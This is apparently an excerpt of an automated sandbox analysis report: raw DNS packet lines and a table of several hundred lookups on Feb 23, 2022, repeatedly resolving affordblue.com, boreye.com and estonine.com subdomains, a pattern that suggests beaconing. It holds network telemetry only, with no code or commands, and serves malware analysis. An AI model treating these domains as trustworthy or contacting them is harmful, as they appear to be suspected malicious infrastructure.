                                              Feb 23, 2022 03:18:35.281928062 CET53589968.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:35.923979998 CET5456653192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:35.943134069 CET53545668.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:37.243433952 CET5514253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:37.265104055 CET53551428.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:38.890449047 CET5458853192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:38.893395901 CET5047153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:38.894129992 CET5027253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:38.910829067 CET53545888.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:38.913140059 CET53502728.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:38.916469097 CET53504718.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:41.081799030 CET5395653192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:41.103137016 CET53539568.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:43.187747955 CET6350353192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:43.236373901 CET53635038.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:44.117515087 CET5969053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:44.138596058 CET53596908.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:45.768086910 CET4999153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:45.789375067 CET53499918.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:47.414551973 CET5197153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:47.435741901 CET53519718.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:47.516845942 CET6545153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:47.538491011 CET53654518.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:49.579732895 CET6364353192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:49.601452112 CET53636438.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:50.236934900 CET5483953192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:50.255825996 CET53548398.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:51.621498108 CET5194153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:51.624475956 CET5943953192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:51.625406027 CET5045053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:51.643297911 CET53519418.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:51.644985914 CET53594398.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:51.645889044 CET53504508.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:57.742340088 CET5949753192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:57.759541988 CET53594978.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:58.243387938 CET5907353192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:58.264429092 CET53590738.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:58.307921886 CET5041853192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:58.329174042 CET53504188.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:59.776154995 CET5155653192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:59.776232958 CET5532153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:59.777285099 CET6337053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:18:59.796046019 CET53515568.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:59.798703909 CET53633708.8.8.8192.168.2.4
                                              Feb 23, 2022 03:18:59.817965984 CET53553218.8.8.8192.168.2.4
                                              Feb 23, 2022 03:19:01.945007086 CET6411553192.168.2.48.8.8.8
                                              Feb 23, 2022 03:19:01.946022987 CET4947253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:19:01.946749926 CET5732153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:19:01.964207888 CET53641158.8.8.8192.168.2.4
                                              Feb 23, 2022 03:19:01.966382980 CET53494728.8.8.8192.168.2.4
                                              Feb 23, 2022 03:19:01.988480091 CET53573218.8.8.8192.168.2.4
                                              Feb 23, 2022 03:19:04.486354113 CET6427153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:19:04.507318020 CET53642718.8.8.8192.168.2.4
                                              Feb 23, 2022 03:19:04.569201946 CET5522953192.168.2.48.8.8.8
                                              Feb 23, 2022 03:19:04.572580099 CET5950053192.168.2.48.8.8.8
                                              Feb 23, 2022 03:19:04.590143919 CET53552298.8.8.8192.168.2.4
                                              Feb 23, 2022 03:19:04.593180895 CET53595008.8.8.8192.168.2.4
                                              Feb 23, 2022 03:19:04.732263088 CET6497253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:19:04.851639986 CET53649728.8.8.8192.168.2.4
                                              Feb 23, 2022 03:19:07.665957928 CET5484253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:19:07.709629059 CET53548428.8.8.8192.168.2.4
                                              Feb 23, 2022 03:19:10.112005949 CET5401853192.168.2.48.8.8.8
                                              Feb 23, 2022 03:19:10.112826109 CET6090253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:19:10.132747889 CET53540188.8.8.8192.168.2.4
                                              Feb 23, 2022 03:19:10.134022951 CET53609028.8.8.8192.168.2.4
                                              Feb 23, 2022 03:19:11.486414909 CET5908253192.168.2.48.8.8.8
                                              Feb 23, 2022 03:19:11.488241911 CET6024153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:19:11.488588095 CET5552153192.168.2.48.8.8.8
                                              Feb 23, 2022 03:19:11.507966995 CET53590828.8.8.8192.168.2.4
                                              Feb 23, 2022 03:19:11.508033991 CET53555218.8.8.8192.168.2.4
                                              Feb 23, 2022 03:19:11.509052038 CET53602418.8.8.8192.168.2.4

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Feb 23, 2022 03:17:15.146673918 CET192.168.2.48.8.8.80x352eStandard query (0)log.boreye.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:18.373079062 CET192.168.2.48.8.8.80xe2c2Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:18.373151064 CET192.168.2.48.8.8.80xd591Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:18.374259949 CET192.168.2.48.8.8.80x9e24Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:18.570517063 CET192.168.2.48.8.8.80x3edbStandard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:18.571837902 CET192.168.2.48.8.8.80xe330Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:19.165021896 CET192.168.2.48.8.8.80x3a9cStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:19.237468004 CET192.168.2.48.8.8.80x731bStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:19.237973928 CET192.168.2.48.8.8.80x69b4Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:19.413949966 CET192.168.2.48.8.8.80xfe36Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:19.415313959 CET192.168.2.48.8.8.80x91a8Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:19.456554890 CET192.168.2.48.8.8.80xd45bStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:20.147267103 CET192.168.2.48.8.8.80xf120Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:20.152009010 CET192.168.2.48.8.8.80x6646Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:20.154330015 CET192.168.2.48.8.8.80xbce2Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:20.631911039 CET192.168.2.48.8.8.80x567bStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:20.634460926 CET192.168.2.48.8.8.80x57beStandard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:20.636790991 CET192.168.2.48.8.8.80xf8d3Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:21.723042011 CET192.168.2.48.8.8.80xc55aStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:21.727518082 CET192.168.2.48.8.8.80xad11Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:21.729856968 CET192.168.2.48.8.8.80x8ea9Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:21.848233938 CET192.168.2.48.8.8.80xb3daStandard query (0)bk.estonine.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:22.172487020 CET192.168.2.48.8.8.80xf91fStandard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:22.189280033 CET192.168.2.48.8.8.80xa964Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:22.197910070 CET192.168.2.48.8.8.80x886bStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:25.690653086 CET192.168.2.48.8.8.80x51bdStandard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:25.692627907 CET192.168.2.48.8.8.80x120cStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:25.693905115 CET192.168.2.48.8.8.80x816aStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:25.843719959 CET192.168.2.48.8.8.80x79daStandard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:25.846021891 CET192.168.2.48.8.8.80xd1abStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:26.601308107 CET192.168.2.48.8.8.80xb318Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:26.604938030 CET192.168.2.48.8.8.80xf492Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:26.610349894 CET192.168.2.48.8.8.80x722bStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:26.767477989 CET192.168.2.48.8.8.80xfc5eStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:26.767563105 CET192.168.2.48.8.8.80xb3ffStandard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:26.903903008 CET192.168.2.48.8.8.80xca46Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:26.909192085 CET192.168.2.48.8.8.80xf29Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:26.909389973 CET192.168.2.48.8.8.80x716cStandard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:27.126938105 CET192.168.2.48.8.8.80xfa4cStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:27.127670050 CET192.168.2.48.8.8.80x12e2Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:27.188863993 CET192.168.2.48.8.8.80x26a1Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:27.314085007 CET192.168.2.48.8.8.80xd6d9Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:27.315356970 CET192.168.2.48.8.8.80x22feStandard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:27.467791080 CET192.168.2.48.8.8.80xf51aStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:27.470284939 CET192.168.2.48.8.8.80x4a94Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:27.529756069 CET192.168.2.48.8.8.80x6505Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:27.835242033 CET192.168.2.48.8.8.80x4b72Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:28.428631067 CET192.168.2.48.8.8.80x678eStandard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:28.430250883 CET192.168.2.48.8.8.80x7844Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:28.430906057 CET192.168.2.48.8.8.80xe5aeStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:28.668838978 CET192.168.2.48.8.8.80xb451Standard query (0)p.boreye.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:30.108908892 CET192.168.2.48.8.8.80xed3aStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:30.925158978 CET192.168.2.48.8.8.80x3ac3Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:30.926697016 CET192.168.2.48.8.8.80xbfaStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:30.927524090 CET192.168.2.48.8.8.80xdeb6Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:32.272149086 CET192.168.2.48.8.8.80x3d7bStandard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:32.274471045 CET192.168.2.48.8.8.80xdab2Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:32.275552988 CET192.168.2.48.8.8.80xd166Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:34.170439005 CET192.168.2.48.8.8.80xb00dStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:34.832075119 CET192.168.2.48.8.8.80xb7abStandard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:34.834609032 CET192.168.2.48.8.8.80xc2d8Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:34.835484028 CET192.168.2.48.8.8.80xf73Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:35.798913002 CET192.168.2.48.8.8.80xd621Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:37.451206923 CET192.168.2.48.8.8.80x1c50Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:37.453051090 CET192.168.2.48.8.8.80xb12dStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:38.141405106 CET192.168.2.48.8.8.80x8c17Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:38.153063059 CET192.168.2.48.8.8.80xe905Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:38.155414104 CET192.168.2.48.8.8.80xc68aStandard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:38.930455923 CET192.168.2.48.8.8.80x532dStandard query (0)p.boreye.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:39.185575962 CET192.168.2.48.8.8.80xc077Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:39.188510895 CET192.168.2.48.8.8.80x8593Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:39.189737082 CET192.168.2.48.8.8.80x5aeStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:39.798258066 CET192.168.2.48.8.8.80x52bStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:39.800189972 CET192.168.2.48.8.8.80x1142Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:39.800718069 CET192.168.2.48.8.8.80xa5c6Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:44.253441095 CET192.168.2.48.8.8.80xc983Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:44.264261007 CET192.168.2.48.8.8.80x891cStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:44.267355919 CET192.168.2.48.8.8.80x21eaStandard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:46.193627119 CET192.168.2.48.8.8.80xa7daStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:46.195482969 CET192.168.2.48.8.8.80x336eStandard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:46.196245909 CET192.168.2.48.8.8.80x5e49Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:47.249001026 CET192.168.2.48.8.8.80x69b5Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:47.281189919 CET192.168.2.48.8.8.80x4374Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:47.282283068 CET192.168.2.48.8.8.80xfdf3Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:47.936031103 CET192.168.2.48.8.8.80xbce3Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:48.725636959 CET192.168.2.48.8.8.80xe77Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:48.729209900 CET192.168.2.48.8.8.80xf198Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:48.731369972 CET192.168.2.48.8.8.80x9611Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:49.842408895 CET192.168.2.48.8.8.80xf0bdStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:49.843561888 CET192.168.2.48.8.8.80x2878Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:49.844214916 CET192.168.2.48.8.8.80xeff4Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:50.080027103 CET192.168.2.48.8.8.80xe71eStandard query (0)p.boreye.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:50.561095953 CET192.168.2.48.8.8.80xb3c6Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:50.594013929 CET192.168.2.48.8.8.80x5dcfStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:50.594844103 CET192.168.2.48.8.8.80x2210Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:52.410819054 CET192.168.2.48.8.8.80xf71eStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:52.722417116 CET192.168.2.48.8.8.80xd717Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:52.724116087 CET192.168.2.48.8.8.80x1406Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:54.595674992 CET192.168.2.48.8.8.80x3622Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:54.598393917 CET192.168.2.48.8.8.80x6801Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:54.601253033 CET192.168.2.48.8.8.80xad2dStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:55.744277954 CET192.168.2.48.8.8.80xc32bStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:55.784830093 CET192.168.2.48.8.8.80x9829Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:55.787615061 CET192.168.2.48.8.8.80x8406Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:56.753768921 CET192.168.2.48.8.8.80xf6f1Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:56.757359028 CET192.168.2.48.8.8.80xf963Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:56.819638968 CET192.168.2.48.8.8.80xc881Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:57.124361992 CET192.168.2.48.8.8.80x5307Standard query (0)p.boreye.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:57.842695951 CET192.168.2.48.8.8.80x86e2Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:57.844325066 CET192.168.2.48.8.8.80x16a8Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:58.385004997 CET192.168.2.48.8.8.80xc2abStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:58.386249065 CET192.168.2.48.8.8.80x2c84Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:17:58.386892080 CET192.168.2.48.8.8.80xdad4Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:00.141848087 CET192.168.2.48.8.8.80x1b85Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:00.160676956 CET192.168.2.48.8.8.80xb3e6Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:00.163531065 CET192.168.2.48.8.8.80xbdcaStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:03.827583075 CET192.168.2.48.8.8.80x98c2Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:04.099941969 CET192.168.2.48.8.8.80xb3daStandard query (0)p.boreye.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:04.414279938 CET192.168.2.48.8.8.80x6bffStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:05.037002087 CET192.168.2.48.8.8.80xc5f8Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:05.038283110 CET192.168.2.48.8.8.80x42d3Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:05.039335966 CET192.168.2.48.8.8.80xb2f1Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:06.017699957 CET192.168.2.48.8.8.80xbb04Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:06.550318956 CET192.168.2.48.8.8.80x5390Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:06.593893051 CET192.168.2.48.8.8.80xd486Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:07.399161100 CET192.168.2.48.8.8.80x135cStandard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:07.498773098 CET192.168.2.48.8.8.80xf43bStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:09.242543936 CET192.168.2.48.8.8.80x93d1Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:09.245345116 CET192.168.2.48.8.8.80x11f6Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:09.246047020 CET192.168.2.48.8.8.80x5eb0Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:09.918097973 CET192.168.2.48.8.8.80x9bb9Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:09.921276093 CET192.168.2.48.8.8.80x14ccStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:10.037482023 CET192.168.2.48.8.8.80x3bddStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:11.689815044 CET192.168.2.48.8.8.80x6d7bStandard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:11.693098068 CET192.168.2.48.8.8.80x2eStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:11.725672007 CET192.168.2.48.8.8.80x765cStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:11.748645067 CET192.168.2.48.8.8.80x1d6dStandard query (0)p.boreye.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:12.471340895 CET192.168.2.48.8.8.80x6a2aStandard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:12.551088095 CET192.168.2.48.8.8.80xd45Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:12.552077055 CET192.168.2.48.8.8.80x954eStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:13.392081976 CET192.168.2.48.8.8.80xd368Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:13.393547058 CET192.168.2.48.8.8.80x713aStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:13.394527912 CET192.168.2.48.8.8.80x3daStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:14.496077061 CET192.168.2.48.8.8.80xcf89Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:14.518726110 CET192.168.2.48.8.8.80xe233Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:14.521399021 CET192.168.2.48.8.8.80x1c4Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:15.163290977 CET192.168.2.48.8.8.80x2595Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:15.164768934 CET192.168.2.48.8.8.80xc67aStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:15.165318966 CET192.168.2.48.8.8.80x36d7Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:17.126071930 CET192.168.2.48.8.8.80x3fe2Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:17.194529057 CET192.168.2.48.8.8.80x3084Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:17.195451975 CET192.168.2.48.8.8.80x8adbStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:20.154019117 CET192.168.2.48.8.8.80x52e3Standard query (0)p.boreye.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:22.863518953 CET192.168.2.48.8.8.80xbfc5Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:22.864291906 CET192.168.2.48.8.8.80xc2f0Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:25.210112095 CET192.168.2.48.8.8.80xc5aStandard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:26.736507893 CET192.168.2.48.8.8.80xe8b2Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:26.804306984 CET192.168.2.48.8.8.80xf402Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:26.805155993 CET192.168.2.48.8.8.80x4144Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:28.193944931 CET192.168.2.48.8.8.80x3d3fStandard query (0)p.boreye.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:28.833328009 CET192.168.2.48.8.8.80x42e1Standard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:28.836766958 CET192.168.2.48.8.8.80xbfd3Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:30.769023895 CET192.168.2.48.8.8.80xa3e0Standard query (0)date.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:30.772142887 CET192.168.2.48.8.8.80x6bf2Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:32.875988960 CET192.168.2.48.8.8.80x99cdStandard query (0)load.affordblue.comA (IP address)IN (0x0001)
                                              Feb 23, 2022 03:18:35.259838104 CET192.168.2.48.8.8.80x1a46Standard query (0)r.affordblue.comA (IP address)IN (0x0001)
